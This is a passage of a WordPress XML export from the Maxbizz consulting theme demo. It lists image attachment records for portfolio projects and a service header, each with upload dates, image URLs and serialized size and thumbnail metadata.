		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:695;s:4:"file";s:21:"2020/09/project-7.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"project-7-261x300.jpg";s:5:"width";i:261;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-7-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-7-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-7-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project-7-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/fund-management/project-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:01:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>823</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:01:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:01:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>822</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:736;s:4:"file";s:21:"2020/09/project-5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"project-5-247x300.jpg";s:5:"width";i:247;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-5-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project-5-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/project-6/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>827</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:605;s:6:"height";i:605;s:4:"file";s:21:"2020/09/project-6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"project-6-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-6-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project-6-605x600.jpg";s:5:"width";i:605;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/project-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>831</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:797;s:4:"file";s:21:"2020/09/project-4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"project-4-271x300.jpg";s:5:"width";i:271;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-4-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project-4-719x600.jpg";s:5:"width";i:719;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/enterprise-loan/project-slide-4/</link>
		<pubDate>Fri, 11 Sep 2020 07:12:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>832</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:12:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:12:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>830</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-4-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-4-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-4-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/project-slide-5/</link>
		<pubDate>Fri, 11 Sep 2020 07:13:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>835</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:13:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:13:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>826</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-5-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-5-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-5-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/project-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>838</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:719;s:6:"height";i:719;s:4:"file";s:21:"2020/09/project-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:21:"project-3-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"project-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"project-3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"project-3-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:21:"project-3-719x600.jpg";s:5:"width";i:719;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/project-slide-3/</link>
		<pubDate>Fri, 11 Sep 2020 07:15:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>839</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:15:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:15:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-3-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-3-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-3-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>project-slide-2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/project-slide-2/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>844</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-slide-2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>842</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/project-slide-2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:970;s:6:"height";i:580;s:4:"file";s:27:"2020/09/project-slide-2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:27:"project-slide-2-300x179.jpg";s:5:"width";i:300;s:6:"height";i:179;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"project-slide-2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"project-slide-2-768x459.jpg";s:5:"width";i:768;s:6:"height";i:459;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"project-slide-2-600x580.jpg";s:5:"width";i:600;s:6:"height";i:580;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-service</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/our-services/pheader-service/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:01 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>869</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:01]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:01]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-service]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-service.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/pheader-service.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:27:"2020/09/pheader-service.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"pheader-service-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"pheader-service-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"pheader-service-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"pheader-service-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:28:"pheader-service-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-service-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-service-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:28:"pheader-service-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:28:"pheader-service-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9: